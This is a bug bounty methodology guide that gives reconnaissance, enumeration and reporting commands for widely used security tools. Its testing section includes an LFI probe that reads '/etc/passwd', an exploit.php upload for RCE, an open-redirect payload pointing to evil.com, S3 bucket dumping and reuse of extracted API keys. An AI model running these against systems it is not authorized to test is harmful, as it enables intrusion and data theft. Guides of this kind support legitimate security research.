Bug Bounty Hunting Methodology 2025
Welcome to the Bug Bounty Methodology 2025 Edition ! This methodology is a basic guide to help you kickstart your bug bounty journey. It outlines the essential steps to navigate your target effectively, but the real challenge lies in identifying high-impact vulnerabilities through your own skills and creativity. This methodology will be updated regularly as new and interesting techniques emerge to enhance your testing process.
## 📜 Table of Contents
Subdomain Enumeration & Initial Scanning
HTTP Probing & Asset Discovery
Advanced Techniques & Parameter Discovery
1. Reconnaissance and Subdomain Enumeration
1.1 Passive Subdomain Enumeration
🛠️Tools:
Subfinder
Copy subfinder -d target.com -silent -all -recursive -o subfinder_subs.txt Amass (Passive Mode)
Copy amass enum -passive -d target.com -o amass_passive_subs.txt CRT.sh Query
Copy curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew crtsh_subs.txt Github Dorking
Copy github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt Results Combination
Copy cat *_subs.txt | sort -u | anew all_subs.txt 1.2 Active Subdomain Enumeration
MassDNS
Copy massdns -r resolvers.txt -t A -o S -w massdns_results.txt wordlist.txt Shuffledns
Copy shuffledns -d target.com -list all_subs.txt -r resolvers.txt -o active_subs.txt DNSX Resolution
Copy dnsx -l active_subs.txt -resp -o resolved_subs.txt SubBrute
Copy python3 subbrute.py target.com -w wordlist.txt -o brute_force_subs.txt FFuF Subdomain
Copy ffuf -u https://FUZZ.target.com -w wordlist.txt -t 50 -mc 200,403 -o ffuf_subs.txt 1.3 Handling Specific (Non-Wildcard) Targets
GAU
Copy gau target.example.com | anew gau_results.txt Waybackurls
Copy waybackurls target.example.com | anew wayback_results.txt Katana
Copy katana -u target.example.com -silent -jc -o katana_results.txt Hakrawler
Copy echo "https://target.example.com" | hakrawler -depth 2 -plain -js -out hakrawler_results.txt Additional Advanced Techniques
Reverse DNS
Copy dnsx -ptr -l resolved_subs.txt -resp-only -o reverse_dns.txt ASN Enumeration
Copy amass intel -asn <ASN_NUMBER> -o asn_results.txt Cloud Asset Enumeration
Copy cloud_enum -k target.com Results Validation
Copy cat all_subs.txt | httpx -silent -title -o live_subdomains.txt
2. Discovery and Probing
2.1 HTTP Probing
HTTPX Probing
Copy httpx -l resolved_subs.txt -p 80,443,8080,8443 -silent -title -sc -ip -o live_websites.txt Custom Filtering
Copy cat live_websites.txt | grep -i "login\|admin" | tee login_endpoints.txt 2.2 JavaScript Analysis
JS Extraction
Copy cat live_websites.txt | waybackurls | grep "\.js" | anew js_files.txt LinkFinder Analysis
Copy python3 linkfinder.py -i js_files.txt -o js_endpoints.txt Sensitive Pattern Search
Copy cat js_files.txt | gf aws-keys | tee aws_keys.txt
cat js_files.txt | gf urls | tee sensitive_urls.txt API Key Validation
Copy curl -X GET "https://api.example.com/resource" -H "Authorization: Bearer <extracted_key>" 2.3 Advanced Google Dorking
Automated Dorking
Copy python3 GitDorker.py -tf <github_token.txt> -q target.com -d dorks.txt -o git_dorks_output.txt Admin/Login Files
Copy site:*.example.com inurl:"*admin | login" | inurl:.php | .asp Config Files
Copy site:*.example.com ext:env | ext:yaml | ext:ini Public Keys
Copy site:*.example.com inurl:"id_rsa.pub" | inurl:".pem" 2.4 URL Discovery
Katana Crawling
Copy katana -list live_websites.txt -jc -o katana_urls.txt Gospider
Copy gospider -s "https://target.com" -d 2 -o gospider_output/ Hakrawler
Copy echo "https://target.com" | hakrawler -depth 3 -plain -out hakrawler_results.txt 2.5 Archive Enumeration
Archive URL Collection
Copy gau --subs target.com | anew archived_urls.txt
waybackurls target.com | anew wayback_urls.txt Parameter Extraction
Copy cat archived_urls.txt | grep "=" | anew parameters.txt
3. Advanced Enumeration Techniques
3.1 Parameter Discovery
Arjun Parameter Discovery
Copy arjun -u "https://target.example.com" -m GET,POST --stable -o params.json ParamSpider Web Parameters
Copy python3 paramspider.py --domain target.com --exclude woff,css,js --output paramspider_output.txt FFuF Parameter Bruteforce
Copy ffuf -u https://target.com/page.php?FUZZ=test -w /usr/share/wordlists/params.txt -o parameter_results.txt 3.2 Cloud Asset Enumeration
Cloud Bucket Enumeration
Copy cloud_enum -k target.com -b buckets.txt -o cloud_enum_results.txt S3 Bucket Access Test
Copy aws s3 ls s3://<bucket_name> --no-sign-request S3 Bucket Content Dump
Copy python3 AWSBucketDump.py -b target-bucket -o dumped_data/ 3.3 Content Discovery
Feroxbuster
Copy feroxbuster -u https://target.com -w /usr/share/wordlists/common.txt -r -t 20 -o recursive_results.txt Dirsearch
Copy dirsearch -u https://target.com -w /usr/share/wordlists/content_discovery.txt -e php,html,js,json -x 404 -o dirsearch_results.txt FFuF Recursive
Copy ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/content_discovery.txt -mc 200,403 -recursion -recursion-depth 3 -o ffuf_results.txt 3.4 API Enumeration
Kiterunner
Copy kr scan https://api.target.com -w /usr/share/kiterunner/routes-large.kite -o api_routes.txt 3.5 ASN Mapping
ASN Lookup
Copy amass intel -asn <ASN_Number> -o asn_ips.txt Shodan Enumeration
Copy shodan search "net:<ip_range>" --fields ip_str,port --limit 100 Censys Asset Search
Copy censys search "autonomous_system.asn:<ASN_Number>" -o censys_assets.txt
4. Vulnerability Testing
4.1 High-Priority Vulnerabilities
🐞CSRF Testing
Copy cat live_websites.txt | gf csrf | tee csrf_endpoints.txt 🐞LFI Testing
Copy cat live_websites.txt | gf lfi | qsreplace "/etc/passwd" | xargs -I@ curl -s @ | grep "root:x:" > lfi_results.txt 🐞RCE Testing
Copy curl -X POST -F "file=@exploit.php" https://target.com/upload 🐞SQLi Testing
Copy ghauri -u "https://target.com?id=1" --dbs --batch 🐞Sensitive Data Search
Copy cat js_files.txt | grep -Ei "key|token|auth|password" > sensitive_data.txt 🐞Open Redirect Test
Copy cat urls.txt | grep "=http" | qsreplace "https://evil.com" | xargs -I@ curl -I -s @ | grep "evil.com"
5. The "Two-Eye" Approach 👀
First Eye: Focus on testing every gathered subdomain, endpoint, or parameter for common vulnerabilities.
Second Eye: Identify “interesting” findings like exposed credentials, forgotten subdomains, or admin panels.
Actionable Steps:
If a vulnerability is identified, create a proof of concept (POC) and test its impact.
If no vulnerabilities are found, pivot to deeper testing on unique subdomains or endpoints.
6. Proof of Concept (POC) Creation
🎥Video POC
Demonstrate vulnerabilities in action using screen recording tools like Greenshot or OBS Studio.
📸Screenshot POC
Capture clear screenshots with annotations to explain each step.
7. Reporting
📝Report Structure
Technical Details
Supporting Evidence (POC)
Remediation
Additional Security Controls
Supporting Materials
Screenshots & Annotations
HTTP Request/Response Logs
Best Practices
Write clear, concise descriptions
Include detailed reproduction steps
Provide actionable remediation advice
Support findings with evidence
Use professional formatting
Highlight business impact
Include verification steps
Copy # Vulnerability Report: [Title]
## Overview
- Severity: [Critical/High/Medium/Low]
- CVSS Score: [Score]
- Affected Component: [Component]
## Description
[Detailed technical description]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step n...]
## Impact
[Business and technical impact]
## Proof of Concept
[Screenshots, videos, code]
## Recommendations
[Detailed fix recommendations]
## References
[CVE, CWE, related resources]